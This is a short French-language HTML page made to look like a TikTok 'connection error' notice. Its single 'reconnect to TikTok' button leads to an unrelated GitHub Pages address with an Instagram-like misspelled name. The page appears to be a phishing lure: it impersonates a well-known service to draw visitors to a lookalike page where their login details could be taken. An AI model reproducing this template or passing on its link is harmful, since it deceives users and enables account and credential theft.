<!DOCTYPE html>
<html lang="fr">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Erreur de Connexion</title>
	<style type="text/css">body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: #fff;
            padding: 20px;
            border: 1px solid #dbdbdb;
            border-radius: 8px;
            text-align: center;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }
        h1 {
            font-size: 24px;
            color: #ff4b5c;
        }
        p {
            font-size: 16px;
            color: #333;
        }
        a {
            display: inline-block;
            margin-top: 20px;
            padding: 10px 20px;
            background-color: #ff007f;
            color: white;
            text-decoration: none;
            border-radius: 5px;
        }
        a:hover {
            background-color: #ff4b5c;
        }
	</style>
</head>
<body>
<div class="container">
<h1>Erreur de Connexion</h1>

<p>Une erreur est survenue lors de la connexion &agrave; <strong>TikTok.com</strong>.</p>

<p>Pour vous reconnecter, veuillez cliquer sur le lien ci-dessous.</p>
<a href="https://instgramvideodrole.github.io/drole/">Se reconnecter &agrave; TikTok</a></div>
</body>
</html>
